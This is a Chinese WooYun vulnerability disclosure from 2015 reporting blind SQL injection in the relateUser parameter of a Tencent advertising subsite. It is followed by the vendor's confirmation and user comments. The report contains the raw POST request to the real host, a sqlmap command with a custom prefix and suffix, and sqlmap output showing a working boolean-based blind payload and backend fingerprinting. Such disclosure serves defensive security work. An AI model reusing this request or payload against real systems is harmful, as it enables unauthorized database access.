缺陷编号:WooYun-2015-0123831
漏洞标题:腾讯某分站SQL注射
相关厂商:腾讯
漏洞作者:Jannock
提交时间:2015-07-01 07:33
公开时间:2015-08-15 14:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向核心白帽子及相关领域专家公开
2015-07-21: 细节向普通白帽子公开
2015-07-31: 细节向实习白帽子公开
2015-08-15: 细节向公众公开
腾讯某分站SQL注射,盲注。
POST /user/delcontent? HTTP/1.1Host: gad.qq.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: cookieConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 48id=8&relateUser=243&showType=1relateUser 参数存在SQL注入。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
python sqlmap.py -u "http://localhost/1.php?s=24397" -p s --prefix "24397 and 1=(case when(1=1" --suffix ") then 1 e<br> lse (select 1 union select 2) end)" --technique=B --dbms=mysql<br> _<br> ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150403}<br> |_ -| . | | | .'| . |<br> |___|_ |_|_|_|_|__,| _|<br> |_| |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual<br> consent is illegal. It is the end user's responsibility to obey all applicable<br> local, state and federal laws. Developers assume no liability and are not respon<br> sible for any misuse or damage caused by this program[*] starting at 23:52:31[23:52:31] [INFO] testing connection to the target URL<br> [23:52:31] [INFO] testing if the target URL is stable. This can take a couple of<br> seconds<br> [23:52:32] [INFO] target URL is stable<br> [23:53:02] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is<br> going to retry the request<br> [23:53:33] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is<br> going to retry the request<br> [23:53:47] [WARNING] heuristic (basic) test shows that GET parameter 's' might n<br> ot be injectable<br> [23:53:52] [INFO] testing for SQL injection on GET parameter 's'<br> do you want to include all tests for 'MySQL' extending provided level (1) and ri<br> sk (1)? [Y/n] n<br> [23:53:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br> [23:54:15] [INFO] GET parameter 's' seems to be 'AND boolean-based blind - WHERE<br> or HAVING clause' injectable<br> [23:54:15] [INFO] checking if the injection point on GET parameter 's' is a fals<br> e positive<br> [23:54:35] [WARNING] it appears that the character '>' is filtered by the back-e<br> nd server. You are strongly advised to rerun with the '--tamper=between'<br> GET parameter 's' is vulnerable. Do you want to keep testing the others (if any)<br> ? [y/N] n<br> sqlmap identified the following injection points with a total of 10 HTTP(s) requ<br> ests:<br> ---<br> Parameter: s (GET)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: s=24397 and 1=(case when(1=1 AND 8352=8352) then 1 else (select 1 u<br> nion select 2) end)<br> ---<br> [23:54:38] [INFO] testing MySQL<br> [23:54:44] [INFO] confirming MySQL<br> [23:55:14] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is<br> going to retry the request<br> [23:56:02] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is<br> going to retry the request<br> [23:56:05] [INFO] the back-end DBMS is MySQL<br> web server operating system: Windows<br> web application technology: Apache 2.0.63, PHP 5.2.14<br> back-end DBMS: MySQL >= 5.0.2 |
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-07-0114:53
非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
暂无
额,一哥又来刷了 http://www.wooyun.org/bugs/wooyun-2015-0123526/trace/304eb21b5a77f36aee296c86ea2dc197 求审核 @疯狗
怎么感觉腾讯的sql注入比我们的还多
@盛大网络 明明就是你的最多
@盛大网络 此时一哥正看着你这句话,缓缓一笑
@盛大网络 明天一哥就上了你
@盛大网络 坐等被爆菊
@盛大网络 厂商也欢乐
@盛大网络 可能是没挑战,或者基本不用盛大产品
@盛大网络 然而事实是盛大不在一哥的监控列表内
厂商在求爆吗?
原文连接
的情况下转载,若非则不得使用我方内容。